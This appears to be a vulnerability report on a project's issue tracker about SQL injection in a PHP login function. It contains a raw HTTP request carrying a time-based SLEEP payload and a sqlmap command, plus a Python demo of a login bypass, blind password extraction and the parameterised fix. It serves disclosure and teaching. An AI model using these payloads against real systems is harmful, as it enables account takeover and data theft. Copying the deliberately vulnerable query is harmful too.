
SQL injection vulnerability in the login method of function.php #63

@naixiao


Cause of the vulnerability: in the login method of function.php, the $user parameter is attacker-controlled, so an attacker can craft malicious statements and carry out malicious operations. The login() function is called from both admin/index.php and api.php.

Reproduction:
PoC:
POST /api.php HTTP/1.1
Host: 94list:83
Content-Length: 88
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Accept: application/json, text/plain, */*
Content-Type: application/x-www-form-urlencoded
Origin: http://94list:83
Referer: http://94list:83/admin/login.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=r3ri1ru38uvdjegkruqr57aorb
Connection: keep-alive

type=login&user=1' AND (SELECT 9679 FROM (SELECT(SLEEP(5)))qzmH) AND 'bXOt'='bXOt&pass=1

sqlmap PoC
Change the body of the request above to type=login&user=1*&pass=1 and save the request to the file x.txt.

python sqlmap.py -r x.txt --current-db --batch

Result: (screenshot attached in the original issue)
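The following is an added, self-contained example (not the reporter's code and not the 94list code base, which the issue only shows as screenshots) that reproduces the class of bug described above against a constructed in-memory SQLite table: a login query built by string concatenation, the same quote breakout the report's payload uses, and the parameterised query that removes it. The report's oracle is MySQL's SLEEP(); SQLite has no SLEEP(), so the example goes one step further than the report and uses the login result itself as a boolean oracle to pull the stored password out character by character, which is the same blind-extraction principle sqlmap relies on for `--current-db`. Table and column names, the sample password, and the function names are assumptions for illustration.

```python
import sqlite3
import string


def make_db():
    # Constructed stand-in for the application's credential table. The real
    # schema is not shown in the report; the names here are assumptions.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT NOT NULL, pass TEXT NOT NULL)")
    conn.execute("INSERT INTO users VALUES ('admin', 'Tr0ub4dor')")
    conn.commit()
    return conn


def login_vulnerable(conn, user, password):
    # Hypothetical reconstruction of the pattern the report describes: the
    # request parameter is spliced into the SQL text, so a single quote in it
    # terminates the literal and everything after it is parsed as SQL.
    sql = "SELECT user FROM users WHERE user='" + user + "' AND pass='" + password + "'"
    return conn.execute(sql).fetchone() is not None


def login_fixed(conn, user, password):
    # Parameterised query: the driver passes the values separately from the
    # statement text, so the payload is only ever compared as a string.
    sql = "SELECT user FROM users WHERE user=? AND pass=?"
    return conn.execute(sql, (user, password)).fetchone() is not None


def bypass_payload():
    # Closes the user literal and comments out the password check.
    return "admin'-- "


def extract_password(login, conn, target="admin", max_len=32):
    """Boolean-based blind extraction through the login oracle.

    Each probe asks one yes/no question about one character of the target's
    stored password; the answer is whether login() reports success.
    Returns the recovered string (empty if the oracle never answers yes).
    """
    alphabet = string.ascii_letters + string.digits + string.punctuation
    recovered = ""
    for pos in range(1, max_len + 1):
        found = None
        for ch in alphabet:
            guess = ch.replace("'", "''")  # keep our own probe well-formed
            probe = f"{target}' AND SUBSTR(pass,{pos},1)='{guess}'-- "
            if login(conn, probe, "x"):
                found = ch
                break
        if found is None:
            break  # no character matched at this position: end of string
        recovered += found
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("bypass against vulnerable login:", login_vulnerable(db, bypass_payload(), "anything"))
    print("bypass against fixed login:     ", login_fixed(db, bypass_payload(), "anything"))
    print("extracted via vulnerable login: ", extract_password(login_vulnerable, db))
    print("extracted via fixed login:      ", repr(extract_password(login_fixed, db)))
```

The `-- ` comment terminator is accepted by both SQLite and MySQL, so the probe shape carries over to the reported target; what does not carry over directly is the oracle, which on MySQL would be the SLEEP() delay shown in the PoC instead of the success/failure of the login.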
